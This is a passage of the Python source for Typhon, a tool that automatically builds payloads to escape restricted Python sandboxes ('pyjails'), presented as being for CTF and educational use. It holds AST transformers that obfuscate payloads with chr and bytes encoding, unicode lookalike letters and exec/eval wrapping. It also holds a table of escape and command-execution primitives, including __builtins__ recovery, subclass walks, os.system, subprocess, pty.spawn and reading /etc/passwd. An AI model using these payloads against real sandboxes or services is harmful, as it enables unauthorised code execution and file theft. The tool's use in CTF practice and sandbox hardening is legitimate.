        Note: Might cause bug when replacing ; inside strings (or whatever).
        If yes, please report it and I'll try to fix it (I'm lazyyyyy now).
        PR welcome.
        """
        return payload.replace(";", "\n")

    @bypasser_must_work_with(["string_slicing"])
    def string_to_str_join(self, payload: str) -> str:
        """
        Convert string to string join.
        'a' + 'b' -> ''.join(['a', 'b'])
        """

        def is_str_like(n: ast.AST) -> bool:
            return (
                isinstance(n, ast.Constant) and isinstance(n.value, str)
            ) or isinstance(n, ast.JoinedStr)

        class Transformer(ast.NodeTransformer):
            def visit_BinOp(self, node: ast.BinOp):
                if isinstance(node.op, ast.Add):
                    parts = flatten_add_chain(node)
                    if parts and all(is_str_like(p) for p in parts):
                        return ast.Call(
                            func=ast.Attribute(
                                value=ast.Constant(value=""),
                                attr="join",
                                ctx=ast.Load(),
                            ),
                            args=[ast.List(elts=parts, ctx=ast.Load())],
                            keywords=[],
                        )
                node.left = self.visit(node.left)
                node.right = self.visit(node.right)
                return node

        def _elem_src(n: ast.AST) -> str:
            if isinstance(n, ast.Constant) and isinstance(n.value, str):
                return repr(n.value)
            return ast.unparse(n)

        def _is_empty_str_join_call(n: ast.AST) -> bool:
            return (
                isinstance(n, ast.Call)
                and isinstance(n.func, ast.Attribute)
                and isinstance(n.func.value, ast.Constant)
                and n.func.value.value == ""
                and n.func.attr == "join"
                and n.args
                and isinstance(n.args[0], ast.List)
            )

        def emit(n: ast.AST) -> str:
            if _is_empty_str_join_call(n):
                items = ",".join(_elem_src(e) for e in n.args[0].elts)
                return "''.join([" + items + "])"
            if isinstance(n, ast.BinOp) and isinstance(n.op, ast.Add):
                return f"{emit(n.left)} + {emit(n.right)}"
            return ast.unparse(n)

        tree = ast.parse(payload, mode="eval")
        new_body = Transformer().visit(tree.body)
        ast.fix_missing_locations(new_body)
        return emit(new_body)

    @bypasser_must_work_with(["string_slicing"])
    def string_to_chr(self, payload: str) -> str:
        """
        'a'+'b'+'c' -> chr(97)+chr(98)+chr(99)'
        """
        from .utils import find_object

        name = find_object(chr, self.local_scope)
        if name is None:
            return payload

        def is_single_char_str_const(n: ast.AST) -> bool:
            return (
                isinstance(n, ast.Constant)
                and isinstance(n.value, str)
                and len(n.value) == 1
            )

        def rebuild_plus_chain(nodes):
            return reduce(lambda l, r: ast.BinOp(left=l, op=ast.Add(), right=r), nodes)

        def _is_named_list_call(n: ast.AST, name: str) -> bool:
            return (
                isinstance(n, ast.Call)
                and isinstance(n.func, ast.Name)
                and n.func.id == name
                and n.args
                and isinstance(n.args[0], ast.List)
            )

        def _emit_min_list(lst: ast.List) -> str:
            items = []
            for e in lst.elts:
                if isinstance(e, ast.Constant) and isinstance(e.value, int):
                    items.append(str(e.value))
                else:
                    items.append(ast.unparse(e))
            return "[" + ",".join(items) + "]"

        def emit_min(n: ast.AST, name: str) -> str:
            if isinstance(n, ast.BinOp) and isinstance(n.op, ast.Add):
                return emit_min(n.left) + "+" + emit_min(n.right)
            if _is_named_list_call(n, name):
                name = n.func.id
                arg0 = n.args[0]  # List
                return f"{name}(" + _emit_min_list(arg0) + ")"
            return ast.unparse(n)

        class Transformer(ast.NodeTransformer):
            def visit_BinOp(self, node: ast.BinOp):
                if isinstance(node.op, ast.Add):
                    parts = flatten_add_chain(node)
                    if parts and all(is_single_char_str_const(p) for p in parts):
                        calls = []
                        for p in parts:
                            code = ord(p.value)
                            call = ast.Call(
                                func=ast.Name(id=name, ctx=ast.Load()),
                                args=[ast.Constant(code)],
                                keywords=[],
                            )
                            calls.append(call)
                        return rebuild_plus_chain(calls)
                node.left = self.visit(node.left)
                node.right = self.visit(node.right)
                return node

        tree = ast.parse(payload, mode="eval")
        new_body = Transformer().visit(tree.body)
        ast.fix_missing_locations(new_body)
        return emit_min(new_body, name)

    @bypasser_must_work_with(["string_slicing"])
    def string_to_bytes_plus(self, payload: str) -> str:
        """
        'a'+'b'+'c' -> bytes([97])+bytes([98])+bytes([99])
        """
        from .utils import find_object

        name = find_object(bytes, self.local_scope)
        if name is None:
            return payload

        def is_single_char_str_const(n: ast.AST) -> bool:
            return (
                isinstance(n, ast.Constant)
                and isinstance(n.value, str)
                and len(n.value) == 1
            )

        def rebuild_plus_chain(nodes):
            return reduce(lambda l, r: ast.BinOp(left=l, op=ast.Add(), right=r), nodes)

        def _is_named_list_call(n: ast.AST, name: str) -> bool:
            return (
                isinstance(n, ast.Call)
                and isinstance(n.func, ast.Name)
                and n.func.id == name
                and n.args
                and isinstance(n.args[0], ast.List)
            )

        def _emit_min_list(lst: ast.List) -> str:
            items = []
            for e in lst.elts:
                if isinstance(e, ast.Constant) and isinstance(e.value, int):
                    items.append(str(e.value))
                else:
                    items.append(ast.unparse(e))
            return "[" + ",".join(items) + "]"

        def emit_min(n: ast.AST, name: str) -> str:
            if isinstance(n, ast.BinOp) and isinstance(n.op, ast.Add):
                return emit_min(n.left) + "+" + emit_min(n.right)
            if _is_named_list_call(n, name):
                name = n.func.id
                arg0 = n.args[0]  # List
                return f"{name}(" + _emit_min_list(arg0) + ")"
            return ast.unparse(n)

        class Transformer(ast.NodeTransformer):
            def visit_BinOp(self, node: ast.BinOp):
                if isinstance(node.op, ast.Add):
                    parts = flatten_add_chain(node)
                    if parts and all(is_single_char_str_const(p) for p in parts):
                        calls = []
                        for p in parts:
                            code = ord(p.value)  # 单字符
                            call = ast.Call(
                                func=ast.Name(id=name, ctx=ast.Load()),
                                args=[
                                    ast.List(elts=[ast.Constant(code)], ctx=ast.Load())
                                ],
                                keywords=[],
                            )
                            calls.append(call)
                        return rebuild_plus_chain(calls)
                node.left = self.visit(node.left)
                node.right = self.visit(node.right)
                return node

        tree = ast.parse(payload, mode="eval")
        new_body = Transformer().visit(tree.body)
        ast.fix_missing_locations(new_body)
        return emit_min(new_body, name)

    @bypasser_must_work_with(["string_slicing"])
    def string_from_string_dict(self, payload: str) -> str:
        """
        There is a globals dict in Typhon, which contains all the string constants found in the scope.
        e.g. {'b': bytes.__doc__[0]}
        This bypasser replaces string constants with their corresponding values in the globals dict.
        'b' -> bytes.__doc__[0]
        """
        from .Typhon import string_dict

        class Transformer(ast.NodeTransformer):
            def visit_Constant(self, node):
                if isinstance(node.value, str) and node.value in string_dict:
                    return ast.Name(id=string_dict[node.value])
                return node

        tree = ast.parse(payload, mode="eval")
        new_body = Transformer().visit(tree.body)
        ast.fix_missing_locations(new_body)
        return ast.unparse(new_body)

    @general_bypasser
    def string_to_bytes_comma(self, payload: str) -> str:
        """
        'abc' -> bytes([97, 98, 99])
        """
        from .utils import find_object

        name = find_object(bytes, self.local_scope)
        if name is None:
            return payload

        tree = ast.parse(payload)

        class PreservingStringTransformer(ast.NodeTransformer):
            def visit_Constant(self, node):
                if isinstance(node.value, str):
                    byte_values = [ord(char) for char in node.value]

                    return ast.Call(
                        func=ast.Name(id=name, ctx=ast.Load()),
                        args=[
                            ast.List(
                                elts=[
                                    ast.Constant(value=byte_val)
                                    for byte_val in byte_values
                                ],
                                ctx=ast.Load(),
                            )
                        ],
                        keywords=[],
                    )

                return node

        transformer = PreservingStringTransformer()
        modified_tree = transformer.visit(tree)
        ast.fix_missing_locations(modified_tree)
        return ast.unparse(modified_tree).replace(", ", ",")

    @bypasser_must_work_with(["string_to_bytes_plus", "string_to_bytes_comma"])
    def nested_bytes_decoder(self, payload: str) -> str:
        """
        bytes([97]) -> bytes([97]).decode()
        """
        tree = ast.parse(payload)

        class NestedBytesTransformer(ast.NodeTransformer):
            def visit_Call(self, node):
                node = self.generic_visit(node)

                if (
                    isinstance(node.func, ast.Name)
                    and node.func.id == "bytes"
                    and len(node.args) == 1
                ):

                    arg = node.args[0]
                    if (
                        isinstance(arg, ast.List)
                        and len(arg.elts) > 0
                        and all(
                            isinstance(elt, ast.Constant) and isinstance(elt.value, int)
                            for elt in arg.elts
                        )
                    ):

                        return ast.Call(
                            func=ast.Attribute(
                                value=node, attr="decode", ctx=ast.Load()
                            ),
                            args=[],
                            keywords=[],
                        )

                return node

        transformer = NestedBytesTransformer()
        modified_tree = transformer.visit(tree)
        ast.fix_missing_locations(modified_tree)

        return ast.unparse(modified_tree)

    def unicode_bypasses(self, payload: str, unicode_charset: str) -> str:
        """
        Bypass unicode encoding and decoding.
        abcdefghijklmnopqrstuvwxyz -> 𝘢𝘣𝘤𝘥𝘦𝘧𝘨𝘩𝘪𝘫𝘬𝘭𝘮𝘯𝘰𝘱𝘲𝘳𝘴𝘵𝘶𝘷𝘸𝘹𝘺𝘻 (unicode_charset)
        """
        # Create mappings: regular -> unicode
        char_map = {}

        for regular, unicode_char in zip(ascii_letters, unicode_charset):
            char_map[regular] = unicode_char

        class Transformer(ast.NodeTransformer):
            """AST Node Transformer to replace non-string characters with Unicode equivalents"""

            def replace_chars(self, s):
                """Replace characters in a string using the char_map"""
                return "".join([char_map[c] if c in char_map else c for c in s])

            def visit_Name(self, node):
                """Process variable/function names"""
                node.id = self.replace_chars(node.id)
                return self.generic_visit(node)

            def visit_Attribute(self, node):
                """Process attribute names (e.g., object.attribute)"""
                node.attr = self.replace_chars(node.attr)
                return self.generic_visit(node)

            def visit_FunctionDef(self, node):
                """Process function definitions (names only)"""
                node.name = self.replace_chars(node.name)
                return self.generic_visit(node)

            def visit_ClassDef(self, node):
                """Process class definitions (names only)"""
                node.name = self.replace_chars(node.name)
                return self.generic_visit(node)

        tree = ast.parse(payload, mode="eval")
        new_body = Transformer().visit(tree.body)
        ast.fix_missing_locations(new_body)
        return ast.unparse(new_body).replace("__", "_＿")

    @bypasser_not_work_with(["unicode_replace_2"])
    def unicode_replace_1(self, payload: str) -> str:
        if self.allow_unicode_bypass:
            payload = self.unicode_bypasses(
                payload, "𝒶𝒷𝒸𝒹ℯ𝒻ℊ𝒽𝒾𝒿𝓀𝓁𝓂𝓃ℴ𝓅𝓆𝓇𝓈𝓉𝓊𝓋𝓌𝓍𝓎𝓏𝒜ℬ𝒞𝒟ℰℱ𝒢ℋℐ𝒥𝒦ℒℳ𝒩𝒪𝒫𝒬ℛ𝒮𝒯𝒰𝒱𝒲𝒳𝒴𝒵"
            )
        return payload

    @bypasser_not_work_with(["unicode_replace_1"])
    def unicode_replace_2(self, payload: str) -> str:
        if self.allow_unicode_bypass:
            payload = self.unicode_bypasses(
                payload, "𝘢𝘣𝘤𝘥𝘦𝘧𝘨𝘩𝘪𝘫𝘬𝘭𝘮𝘯𝘰𝘱𝘲𝘳𝘴𝘵𝘶𝘷𝘸𝘹𝘺𝘻𝘈𝘉𝘊𝘋𝘌𝘍𝘎𝘏𝘐𝘑𝘒𝘓𝘔𝘕𝘖𝘗𝘘𝘙𝘚𝘛𝘜𝘝𝘞𝘟𝘠𝘡"
            )
        return payload

    # @after_tagging_bypasser
    @recursion_protection
    def repr_to_exec(self, payload: str) -> str:
        """
        wraps the payload with exec()
        __import__('os').system('ls') -> exec("__import__('os').popen('ls').read()")
        """
        from .utils import find_object

        name = find_object(exec, self.local_scope)
        if name is None:
            return payload
        single_comma = payload.find("'")
        double_comma = payload.find('"')
        if single_comma > double_comma:
            quote = '"'
        elif double_comma > single_comma:
            quote = "'"
        else:
            quote = "'"
        return f"{name}({quote}{payload}{quote})"

    # @after_tagging_bypasser
    @recursion_protection
    def repr_to_eval(self, payload: str) -> str:
        """
        wraps the payload with exec()
        __import__('os').system('ls') -> eval("__import__('os').popen('ls').read()")
        """
        if ";" in payload or "\n" in payload:
            return payload
        from .utils import find_object

        name = find_object(eval, self.local_scope)
        if name is None:
            return payload
        single_comma = payload.find("'")
        double_comma = payload.find('"')
        if single_comma > double_comma:
            quote = '"'
        elif double_comma > single_comma:
            quote = "'"
        else:
            quote = "'"
        return f"{name}({quote}{payload}{quote})"

    @bypasser_must_work_with(["string_to_str_join"])
    def empty_string_to_str_object(self, payload: str) -> str:
        """
        "".join([]) -> chr().join([])
        """
        from .utils import find_object

        string_name = find_object(str, self.local_scope)
        if string_name is None:
            return payload

        class Transformer(ast.NodeTransformer):
            def visit_Constant(self, node):
                if isinstance(node.value, str) and node.value == "":
                    return ast.Call(
                        func=ast.Name(id=string_name, ctx=ast.Load()),
                        args=[],
                        keywords=[],
                    )
                return node

            def visit_Expr(self, node):
                self.generic_visit(node)
                return node

        tree = ast.parse(payload, mode="eval")
        new_tree = Transformer().visit(tree)
        ast.fix_missing_locations(new_tree)
        return ast.unparse(new_tree)

    @general_bypasser
    def dict_to_get(self, payload: str) -> str:
        """
        a['b'] -> a.get('b')
        """

        def _const_str_from_slice(slice_node):
            node = slice_node

            if isinstance(node, ast.Constant) and isinstance(node.value, str):
                return node
            return None

        class Transformer(ast.NodeTransformer):
            def visit_Subscript(self, node: ast.Subscript):
                self.generic_visit(node)

                key_const = _const_str_from_slice(node.slice)
                if key_const is None:
                    return node

                return ast.Call(
                    func=ast.Attribute(value=node.value, attr="get", ctx=ast.Load()),
                    args=[key_const],
                    keywords=[],
                )

        tree = ast.parse(payload, mode="eval")
        new_tree = Transformer().visit(tree)
        ast.fix_missing_locations(new_tree)
        return ast.unparse(new_tree)

    @general_bypasser
    def binop_to_method(self, payload: str) -> str:
        """
        a+b -> a.__add__(b)
        """

        class Transformer(ast.NodeTransformer):
            def visit_BinOp(self, node):
                method_map = {
                    ast.Add: "__add__",
                    ast.Sub: "__sub__",
                    ast.Mult: "__mul__",
                    ast.Div: "__truediv__",
                    ast.FloorDiv: "__floordiv__",
                    ast.Mod: "__mod__",
                    ast.Pow: "__pow__",
                    ast.LShift: "__lshift__",
                    ast.RShift: "__rshift__",
                    ast.BitOr: "__or__",
                    ast.BitXor: "__xor__",
                    ast.BitAnd: "__and__",
                    ast.MatMult: "__matmul__",
                }

                if type(node.op) in method_map:
                    method_name = method_map[type(node.op)]
                    return ast.Call(
                        func=ast.Attribute(
                            value=self.visit(node.left),
                            attr=method_name,
                            ctx=ast.Load(),
                        ),
                        args=[self.visit(node.right)],
                        keywords=[],
                    )

                return self.generic_visit(node)

        tree = ast.parse(payload, mode="eval")
        new_tree = Transformer().visit(tree)
        ast.fix_missing_locations(new_tree)
        return ast.unparse(new_tree)



# Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0

__version__ = "1.0.2"

from .Typhon import bypassRCE, bypassREAD, bypassMAIN


__all__ = [
    "bypassMAIN",
    "bypassRCE",
    "bypassREAD",
]



RCE_data = {
    "user_defined_function": [["def RANDOMVARNAME():RANDOMSTRING", ""]],
    "user_defined_lambda": [["RANDOMVARNAME=lambda:RANDOMSTRING", ""]],
    "user_defined_class": [["class USER_DEFINED_CLASS:RANDOMSTRING", ""]],
    "directly_getshell": [
        ["help()", "help"],
        ["breakpoint()", "breakpoint"],
        ["exec(input())", "exec,input"],
        ["eval(input())", "eval,input"],
        ["compile(input(),RANDOMSTRING,'exec')", "compile,input"],
        ["compile(input(),RANDOMSTRING,'eval')", "compile,input"],
        ["compile(input(),RANDOMSTRING,'single')", "compile,input"],
        [
            "from os import system as __getattr__;from __main__ import sh",
            "BUILTINS_SET_CHANGED|BUILTINS_SET",
        ],
        [
            "from os import popen as __getattr__;from __main__ import sh",
            "BUILTINS_SET_CHANGED|BUILTINS_SET",
        ],
        [
            "from uuid import _get_command_stdout as __getattr__;from __main__ import sh",
            "BUILTINS_SET_CHANGED|BUILTINS_SET",
        ],
        ["import pdb;pdb.set_trace()", "BUILTINS_SET_CHANGED|BUILTINS_SET"],
    ],
    "builtins2RCEinput": [
        ["BUILTINS_SET['help']()", "BUILTINS_SET"],
        ["MODULE_BUILTINS.help()", "MODULE_BUILTINS"],
        ["BUILTINS_SET['breakpoint']()", "BUILTINS_SET"],
        ["MODULE_BUILTINS.breakpoint()", "MODULE_BUILTINS"],
        ["BUILTINS_SET['exec'](BUILTINS_SET['input']())", "BUILTINS_SET"],
        ["MODULE_BUILTINS.exec(MODULE_BUILTINS.input())", "MODULE_BUILTINS"],
        ["BUILTINS_SET['eval'](BUILTINS_SET['input']())", "BUILTINS_SET"],
        ["MODULE_BUILTINS.eval(MODULE_BUILTINS.input())", "MODULE_BUILTINS"],
        [
            "BUILTINS_SET['compile'](BUILTINS_SET['input'](),RANDOMSTRING,'exec')",
            "BUILTINS_SET",
        ],
        [
            "MODULE_BUILTINS.compile(MODULE_BUILTINS.input(),RANDOMSTRING,'exec')",
            "MODULE_BUILTINS",
        ],
        [
            "BUILTINS_SET['compile'](BUILTINS_SET['input'](),RANDOMSTRING,'eval')",
            "BUILTINS_SET",
        ],
        [
            "MODULE_BUILTINS.compile(MODULE_BUILTINS.input(),RANDOMSTRING,'eval')",
            "MODULE_BUILTINS",
        ],
        [
            "BUILTINS_SET['compile'](BUILTINS_SET['input'](),RANDOMSTRING,'single')",
            "BUILTINS_SET",
        ],
        [
            "MODULE_BUILTINS.compile(MODULE_BUILTINS.input(),RANDOMSTRING,'single')",
            "MODULE_BUILTINS",
        ],
        ["sys.breakpointhook()", "sys"],
    ],
    "get_user_defined_function": [["def RANDOMVARNAME():RANDOMSTRING", ""]],
    "get_user_defined_lambda": [["RANDOMVARNAME=lambda:RANDOMSTRING", ""]],
    "get_user_defined_class": [["class USER_DEFINED_CLASS:RANDOMSTRING", ""]],
    "restore_builtins_in_current_ns": [
        ["__builtins__", "BUILTINS_SET_CHANGED"],
        ["vars()['__builtins__']", "vars"],
        ["globals()['__builtins__']", "globals"],
        ["locals()['__builtins__']", "locals"],
        ["help.__call__.__globals__['__builtins__']", "help"],
        ["license.__call__.__globals__['__builtins__']", "license"],
        ["credits.__call__.__globals__['__builtins__']", "credits"],
        ["__build_class__.__self__", "__build_class__"],
        ["__import__.__self__", "__import__"],
        ["help.__repr__.__globals__['__builtins__']", "help"],
        ["abs.__self__", "abs"],
        ["aiter.__self__", "aiter"],
        ["all.__self__", "all"],
        ["anext.__self__", "anext"],
        ["any.__self__", "any"],
        ["ascii.__self__", "ascii"],
        ["bin.__self__", "bin"],
        ["breakpoint.__self__", "breakpoint"],
        ["callable.__self__", "callable"],
        ["chr.__self__", "chr"],
        ["compile.__self__", "compile"],
        ["delattr.__self__", "delattr"],
        ["dir.__self__", "dir"],
        ["divmod.__self__", "divmod"],
        ["eval.__self__", "eval"],
        ["exec.__self__", "exec"],
        ["format.__self__", "format"],
        ["getattr.__self__", "getattr"],
        ["globals.__self__", "globals"],
        ["hasattr.__self__", "hasattr"],
        ["hash.__self__", "hash"],
        ["hex.__self__", "hex"],
        ["id.__self__", "id"],
        ["isinstance.__self__", "isinstance"],
        ["issubclass.__self__", "issubclass"],
        ["iter.__self__", "iter"],
        ["len.__self__", "len"],
        ["locals.__self__", "locals"],
        ["max.__self__", "max"],
        ["min.__self__", "min"],
        ["next.__self__", "next"],
        ["oct.__self__", "oct"],
        ["ord.__self__", "ord"],
        ["pow.__self__", "pow"],
        ["print.__self__", "print"],
        ["repr.__self__", "repr"],
        ["round.__self__", "round"],
        ["setattr.__self__", "setattr"],
        ["sorted.__self__", "sorted"],
        ["sum.__self__", "sum"],
        ["vars.__self__", "vars"],
        ["USER_DEFINED_FUNCTION.__globals__['__builtins__']", "USER_DEFINED_FUNCTION"],
        ["USER_DEFINED_LAMBDA.__globals__['__builtins__']", "USER_DEFINED_LAMBDA"],
        ["GENERATOR.f_builtins", "GENERATOR"],
        ["GENERATOR.f_globals['__builtins__']", "GENERATOR"],
        ["GENERATOR.f_back.f_builtins", "GENERATOR"],
        ["GENERATOR.f_back.f_globals['__builtins__']", "GENERATOR"],
    ],
    "import": [
        ["GENERATOR.f_globals['__builtins__'].__import__", "GENERATOR"],
        ["GENERATOR.f_back_f_globals['__builtins__'].__import__", "GENERATOR"],
        ["__import__", "__import__"],
        ["BUILTINS_SET['__import__']", "BUILTINS_SET"],
        ["MODULE_BUILTINS.__import__", "MODULE_BUILTINS"],
        ["importlib.__import__", "importlib"],
    ],
    "load_module": [
        ["GENERATOR.f_globals['__loader__'].load_module", "GENERATOR"],
        ["GENERATOR.f_back.f_globals['__loader__'].load_module", "GENERATOR"],
        ["__loader__.load_module", "__loader__"],
        ["BUILTINS_SET['__loader__'].load_module", "BUILTINS_SET"],
        ["MODULE_BUILTINS.__loader__.load_module", "MODULE_BUILTINS"],
        ["importlib.import_module", "importlib"],
    ],
    "modules": [["sys.modules", "sys"]],
    "generator": [
        ["(RANDOMVARNAME for RANDOMVARNAME in ()).gi_frame", ""],
        ["(await RANDOMVARNAME for RANDOMVARNAME in ()).ag_frame", ""],
        [
            "try:1/0\nexcept EXCEPTION_ZERODIVISIONERROR as e:e.__traceback__.tb_frame",
            "EXCEPTION_ZERODIVISIONERROR",
        ],
        ["try:1/0\nexcept Exception as e:e.__traceback__.tb_frame", "EXCEPTION"],
        ["async def a():pass;a().cr_frame", ""],
        ["sys._getframe()", "sys"],
    ],
    "type": [
        ["BUILTINOBJ.__class__.__class__", ""],
        ["BUILTINtype.__class__", ""],
        ["type(USER_DEFINED_CLASS).__class__", "type,USER_DEFINED_CLASS"],
    ],
    "restore_builtins_in_other_ns": [
        ["TYPE.__subclasses__(TYPE)[0].register.__globals__['__builtins__']", "TYPE"],
        ["OBJECT.__reduce_ex__(3)[0].__globals__['__builtins__']", "OBJECT"],
        ["{}.__class__.__subclasses__()[2].copy.__globals__['__builtins__']", ""],
        ["dict.__subclasses__()[2].copy.__globals__['__builtins__']", "dict"],
        ["{}.__class__.__subclasses__()[2].update.__globals__['__builtins__']", ""],
        ["dict.__subclasses__()[2].update.__globals__['__builtins__']", "dict"],
        ["GENERATOR.f_back.f_builtins", "GENERATOR"],
        ["GENERATOR.f_back.f_globals['__builtins__']", "GENERATOR"],
    ],
    "object": [
        ["BUILTINOBJ.__class__.__bases__[0]", ""],
        ["BUILTINOBJ.__class__.__mro__[-1]", ""],
        ["BUILTINOBJ.__class__.__mro__[1]", ""],
        ["BUILTINtype.__class__.__bases__[0]", ""],
        ["BUILTINtype.__class__.__mro__[-1]", ""],
        ["BUILTINtype.__class__.__mro__[1]", ""],
    ],
    "__import__2RCE": [
        ["ctypes.CDLL(None).system(COMMAND.encode())", "ctypes"],
        ["os.execl(CMD_FILE,UNFOLD_CMD_ARGS)", "os"],
        ["os.execle(CMD_FILE,UNFOLD_CMD_ARGS)", "os"],
        ["os.execlp(CMD_FILE,CMD_FILE,UNFOLD_CMD_ARGS)", "os"],
        ["os.execlpe(CMD_FILE,CMD_FILE,UNFOLD_CMD_ARGS)", "os"],
        ["os.execv(CMD_FILE,[UNFOLD_CMD_ARGS])", "os"],
        ["os.execve(CMD_FILE,[UNFOLD_CMD_ARGS])", "os"],
        ["os.execvp(CMD_FILE,CMD_FILE,[UNFOLD_CMD_ARGS])", "os"],
        ["os.execvpe(CMD_FILE,CMD_FILE,[UNFOLD_CMD_ARGS])", "os"],
        ["os.system(COMMAND)", "os"],
        ["os.popen(COMMAND)", "os"],
        ["pty.spawn(COMMAND)", "pty"],
        ["pydoc.pipepager(RANDOMSTRING,COMMAND)", "pydoc"],
        ["subprocess.call(COMMAND)", "subprocess"],
        ["subprocess.check_call(COMMAND)", "subprocess"],
        ["subprocess.check_output(COMMAND)", "subprocess"],
        ["subprocess.getstatusoutput(COMMAND)", "subprocess"],
        ["subprocess.getoutput(COMMAND)", "subprocess"],
        ["subprocess.run(COMMAND)", "subprocess"],
        ["subprocess.Popen(COMMAND)", "subprocess"],
        ["uuid._get_command_stdout(COMMAND)", "uuid"],
        [
            "subprocess._posixsubprocess.fork_exec([bCMD_FILE,UNFOLD_CMD_ARGS],[bCMD_FILE],True,(),None,None,-1,-1,-1,-1,-1,-1,*(os.pipe()),False,False,False,None,None,None,-1,None,False)",
            "subprocess",
        ],
        [
            "_posixsubprocess.fork_exec([bCMD_FILE,UNFOLD_CMD_ARGS],[bCMD_FILE],True,(),None,None,-1,-1,-1,-1,-1,-1,*(os.pipe()),False,False,False,None,None,None,-1,None,False)",
            "_posixsubprocess",
        ],
        [
            "multiprocessing.util.spawnv_passfds(bCMD_FILE,[bCMD_FILE,UNFOLD_CMD_ARGS],[])",
            "multiprocessing",
        ],
    ],
    "exec": [
        ["profile.run", "profile"],
        ["timeit.timeit", "timeit"],
    ],
    "filecontentstring": [
        ["linecache.getline(COMMAND,1)", "linecache"],
        ["FILECONTENTSIO.read()", "FILECONTENTSIO"],
    ],
    "filecontentsio": [
        ["io.FileIO(COMMAND)", "io"],
        ["io.open(COMMAND)", "io"],
        ["io.open('/etc/passwd').buffer.raw.__class__(COMMAND)", "io"],
        ["codecs.open(COMMAND)", "codecs"],
        ["open(COMMAND)", "open"],
    ],
    "print_filecontent": [
        ["int(*FILECONTENTSIO)", "int,FILECONTENTSIO"],
        ["float(*FILECONTENTSIO)", "float,FILECONTENTSIO"],
        ["complex(*FILECONTENTSIO)", "complex,FILECONTENTSIO"],
        ["exit(set(*FILECONTENTSIO))", "exit,FILECONTENTSIO"],
        ["exit(*FILECONTENTSIO)", "exit,FILECONTENTSIO"],
        ["open(*FILECONTENTSIO)", "open,FILECONTENTSIO"],
        ["help(*FILECONTENTSIO)", "help,FILECONTENTSIO"],
        ["print(*FILECONTENTSIO)", "print,FILECONTENTSIO"],
        ["raise Exception(*FILECONTENTSIO)", "Exception,FILECONTENTSIO"],
        ["int(*linecache.getlines(COMMAND))", "int,linecache"],
        ["float(*linecache.getlines(COMMAND)", "float,linecache"],
        ["complex(*linecache.getlines(COMMAND)", "complex,linecache"],
        ["exit(set(*linecache.getlines(COMMAND))", "exit,linecache"],
        ["exit(*linecache.getlines(COMMAND))", "exit,linecache"],
        ["open(*linecache.getlines(COMMAND))", "open,linecache"],
        ["help(*linecache.getlines(COMMAND))", "help,linecache"],
        ["print(*linecache.getlines(COMMAND))", "print,linecache"],
        ["raise Exception(*linecache.getlines(COMMAND))", "Exception,linecache"],
        ["int(FILECONTENTSTRING)", "int,FILECONTENTSTRING"],
        ["float(FILECONTENTSTRING)", "float,FILECONTENTSTRING"],
        ["complex(FILECONTENTSTRING)", "complex,FILECONTENTSTRING"],
        ["exit(set(FILECONTENTSTRING))", "exit,FILECONTENTSTRING"],
        ["exit(FILECONTENTSTRING)", "exit,FILECONTENTSTRING"],
        ["open(FILECONTENTSTRING)", "open,FILECONTENTSTRING"],
        ["help(FILECONTENTSTRING)", "help,FILECONTENTSTRING"],
        ["print(FILECONTENTSTRING)", "print,FILECONTENTSTRING"],
        ["raise Exception(FILECONTENTSTRING)", "Exception,FILECONTENTSTRING"],
    ],
    "python2": {
        "RCE_system_functions": [
            ["commands.getstatusoutput(CMD)", "exec"],
            ["commands.getoutput(CMD)", "exec"],
            ["commands.getstatus(CMD)", "exec"],
        ]
    },
}



# This code is the main file of the Typhon package.
# It is emphasized again that the code is only for educational purposes
# (like in CTFs) and should not be used for any malicious purposes.
# The code is maintained on github. If any bugs found or you have any
# suggestions, please raise an issue or pull request on the github
# repository https://github.com/Team-intN18-SoybeanSeclab/Typhon.
# If you have any questions, please feel free to contact me.
# Weilin Du <lamentxu644@gmail.com>, 2025.

subclasses = object.__subclasses__()[:-1]  # delete ast.AST

import logging

from inspect import currentframe
from typing import Any, Dict, Union

if __name__ == "__main__":
    print(
        "This is the main file of the Typhon package. \
Please run bypass*() function to bypass the sandbox."
    )
    exit(0)

# need to be set before other imports
log_level_ = "INFO"  # changable in bypassMAIN()
search_depth = 5  # changable in bypassMAIN()
logging.basicConfig(level=log_level_, format="%(levelname)s %(message)s")
logger = logging.getLogger(__name__)

# get current global scope
current_frame = currentframe()
while current_frame.f_globals["__name__"] != "__main__":
    current_frame = current_frame.f_back
current_global_scope = current_frame.f_globals

from .utils import *

# The RCE data including RCE functions and their parameters.
from .RCE_data import *

BANNER = (
    r"""
    .-')          _                 Typhon: a pyjail bypassing tool
   (`_^ (    .----`/                
    ` )  \_/`   __/     __,    [Typhon Version]: v1.0.2 dev
    __{   |`  __/      /_/     [Python Version]: v"""
    + sys.version.split()[0]
    + r"""
   / _{    \__/ '--.  //       [Github]: https://github.com/Team-intN18-SoybeanSeclab/Typhon
   \_> \_\  >__/    \((        [Author]: LamentXU <lamentxu644@gmail.com>
        _/ /` _\_   |))       
"""
)

print(BANNER)


def bypassMAIN(
    local_scope: Dict[str, Any] = None,
    banned_chr: list = [],
    banned_ast: List[ast.AST] = [],
    banned_re: Union[str, List[str]] = [],
    max_length: int = None,
    allow_unicode_bypass: bool = False,
    print_all_payload: bool = False,
    interactive: bool = True,
    depth: int = 5,
    recursion_limit: int = 100,
    log_level: str = "INFO",
) -> None:
    """
    This is the main function of the Typhon package.
    Every bypass function calls this for basic bypassing.
    This function basically gets every useful thing in possible
    for further bypassing implemented in other bypass* functions.

    :param local_scope: is a list of local variables in the sandbox environment.
    :param banned_chr: is a list of blacklisted characters.
    :param banned_ast: is a list of banned AST.
    :param banned_re: is a banned regex.
    :param allow_unicode_bypass: if unicode bypasses are allowed.
    :param depth: is the depth that combined bypassing being generarted.
    :param recursion_limit: is the maximum recursion depth for bypassers.
    :param print_all_payload: if all payloads should be printed.
    :param interactive: if the pyjail is a interactive shell that allows stdin.
    :param log_level: is the logging level, default is INFO, change it to
    DEBUG for more details.
    """
    global achivements, log_level_, generated_path, search_depth, tagged_scope, try_to_restore, reminder, string_dict, allowed_letters, banned_ast_, banned_chr_, banned_re_, max_length_, original_scope
    if isinstance(banned_re, str):
        banned_re = [banned_re]  # convert to list if it's a string
    banned_chr_ = banned_chr
    banned_ast_ = banned_ast
    banned_re_ = banned_re
    max_length_ = max_length
    sys.setrecursionlimit(recursion_limit)
    logger.debug("[*] current recursion limit: %d", sys.getrecursionlimit())
    string_dict = (
        {}
    )  # The dictionary of string literals found in the scope (e.g. {'b': bytes.__doc__[0]})
    useful_modules = [
        "os",
        "subprocess",
        "uuid",
        "pydoc",
        "_posixsubprocess",
        "multiprocessing",
        "builtins",
        "codecs",
        "warnings",
        "base64",
